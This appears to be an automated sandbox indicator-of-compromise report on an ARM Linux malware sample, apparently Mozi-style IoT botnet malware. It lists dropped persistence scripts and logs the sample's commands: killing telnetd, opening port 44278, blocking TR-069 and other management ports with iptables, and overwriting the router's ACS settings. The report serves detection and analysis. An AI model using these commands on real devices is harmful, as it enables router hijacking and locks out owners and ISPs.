IOCReport

Files

File Path
Type
Category
Malicious
bin.sh
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/bootmisc.sh
ASCII text
dropped
malicious
/etc/init.d/checkfs.sh
ASCII text
dropped
malicious
/etc/init.d/checkroot-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/checkroot.sh
ASCII text
dropped
malicious
/etc/init.d/hostname.sh
ASCII text
dropped
malicious
/etc/init.d/hwclock.sh
ASCII text
dropped
malicious
/etc/init.d/mountall-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/mountall.sh
ASCII text
dropped
malicious
/etc/init.d/mountdevsubfs.sh
ASCII text
dropped
malicious
/etc/init.d/mountkernfs.sh
ASCII text
dropped
malicious
/etc/init.d/mountnfs-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/mountnfs.sh
ASCII text
dropped
malicious
/etc/init.d/umountnfs.sh
ASCII text
dropped
malicious
/etc/profile.d/Z97-byobu.sh
ASCII text
dropped
malicious
/etc/profile.d/apps-bin-path.sh
ASCII text
dropped
malicious
/etc/profile.d/bash_completion.sh
ASCII text
dropped
malicious
/etc/profile.d/cedilla-portuguese.sh
ASCII text
dropped
malicious
/etc/profile.d/vte-2.91.sh
ASCII text
dropped
malicious
/etc/rc.local
ASCII text
dropped
malicious
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
malicious
/usr/bin/gettext.sh
ASCII text
dropped
malicious
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
dropped
malicious
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
dropped
malicious
/boot/grub/i386-pc/modinfo.sh
ASCII text
dropped
clean
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
dropped
clean
/etc/acpi/asus-wireless.sh
ASCII text
dropped
clean
/etc/acpi/ibm-wireless.sh
ASCII text
dropped
clean
/etc/acpi/powerbtn.sh
ASCII text
dropped
clean
/etc/acpi/tosh-wireless.sh
ASCII text
dropped
clean
/etc/acpi/undock.sh
ASCII text
dropped
clean
/etc/bash_completion.d/libreoffice.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/action_wpa.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/functions.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/ifupdown.sh
ASCII text
dropped
clean
/tmp/.config
ASCII text
dropped
clean
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
dropped
clean
/usr/share/alsa/utils.sh
ASCII text
dropped
clean
/usr/share/brltty/initramfs/brltty.sh
ASCII text
dropped
clean
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
dropped
clean
/usr/share/cups/braille/index.sh
ASCII text
dropped
clean
/usr/share/cups/braille/indexv3.sh
ASCII text
dropped
clean
/usr/share/cups/braille/indexv4.sh
ASCII text
dropped
clean
/usr/share/debconf/confmodule.sh
ASCII text
dropped
clean
/usr/share/doc/acpid/examples/ac.sh
ASCII text
dropped
clean
/usr/share/doc/acpid/examples/default.sh
ASCII text
dropped
clean
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
dropped
clean
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
dropped
clean
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
dropped
clean
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
dropped
clean
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
dropped
clean
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
dropped
clean
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
dropped
clean
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
dropped
clean
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
dropped
clean
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
dropped
clean
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
dropped
clean
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
dropped
clean
/usr/share/hplip/hplip_clean.sh
ASCII text
dropped
clean
/usr/share/keyutils/request-key-debug.sh
ASCII text
dropped
clean
/usr/share/lightdm/guest-session/setup.sh
ASCII text
dropped
clean
/usr/share/os-prober/common.sh
ASCII text
dropped
clean
/usr/share/vim/vim74/macros/less.sh
ASCII text
dropped
clean
/usr/share/xscreensaver/xscreensaver-wrapper.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/autoload.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/status.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/udev-install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/features/list-arch.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/s390/config3270.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/kernel/vdso/gen_vdso_offsets.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/blackfin/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/ia64/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/m32r/boot/compressed/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/m68k/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/mn10300/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/nios2/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/parisc/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/prom_init_check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/systbl_chk.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/relocs_check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/s390/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/sh/boot/compressed/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/sparc/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/entry/vdso/checkundef.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/kernel/cpu/mkcapflags.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/tools/calc_run_size.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/um/vdso/checkundef.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/parameters.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_bench_xmit_mode_netif_receive.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample01_simple.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample02_multiqueue.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample03_burst_single_flow.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/check_extable.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/checksyscalls.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/decode_stacktrace.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/depmod.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/dtc/update-dtc-source.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-goto.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-version.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_32-has-stack-protector.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_64-has-stack-protector.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gen_initramfs_list.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/headers.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/headers_install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/lxdialog/check-lxdialog.sh
C source, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/merge_config.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/ld-version.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/link-vmlinux.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/mkuboot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/selinux/install_policy.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/tags.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/xen-hypercalls.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/xz_wrap.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/spl/autogen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/spl/scripts/check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/build/tests/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/bondvf.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dhcp_info.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dns_info.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_set_ifconfig.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/nfsd/inject_fault.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/arch/x86/tests/gen-insn-x86-dat.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-archive.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-completion.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-with-kcore.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/util/generate-cmdlist.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_plot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_script.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/utils/version-gen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/fault-injection/failcmd.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/cpu-hotplug/cpu-on-off-test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/efivarfs/efivarfs.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_filesystem.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_userhelper.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/functional/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/gen_kselftest_tar.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/kselftest_install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memfd/run_fuse_test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memory-hotplug/mem-on-off-test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/net/test_bpf.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/config2frag.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configNR_CPUS.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configcheck.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configinit.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/cpus2use.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-build.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-lock.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-rcu.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-test-1-run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm.sh
awk or perl script, ASCII text, with very long lines
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-build.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-console.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-torture.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/lock/ver_functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/rcu/ver_functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/static_keys/test_static_keys.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/user/test_user_copy.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/x86/check_cc.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram01.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram02.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram_lib.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/time/udelay_test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/hcd-tests.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/autogen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/cleanup.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/vm/slabinfo-gnuplot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/zfs/autogen.sh
ASCII text
dropped
clean
/var/crash/_usr_share_apport_apport-checkreports.1000.crash
ASCII text
dropped
clean
/var/crash/_usr_share_apport_apport-gtk.1000.crash
ASCII text
dropped
clean

Processes

Path
Cmdline
Malicious
/tmp/bin.sh
/usr/bin/qemu-arm /tmp/bin.sh
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
clean
/bin/sh
n/a
clean
/usr/bin/killall
killall -9 telnetd utelnetd scfgmgr
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 44278 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 44278 -j ACCEPT
clean
/sbin/iptables
n/a
clean
/sbin/modprobe
/sbin/modprobe ip_tables
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44278 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 44278 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44278 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --destination-port 44278 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44278 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --source-port 44278 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 44278 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 44278 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 44278 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 44278 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44278 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --dport 44278 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44278 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --sport 44278 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 58000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 58000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 58000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 35000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 50023 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 7547 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 35000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 50023 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 50023 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 35000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 7547 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 7547 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --destination-port 5353 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p udp --destination-port 5353 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --source-port 5353 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p udp --source-port 5353 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 5353 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --destination-port 5353 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 5353 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --source-port 5353 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --dport 5353 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p udp --dport 5353 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --sport 5353 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p udp --sport 5353 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 5353 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --dport 5353 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 5353 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --sport 5353 -j ACCEPT
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-checkreports
/usr/bin/python3 /usr/share/apport/apport-checkreports --system
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
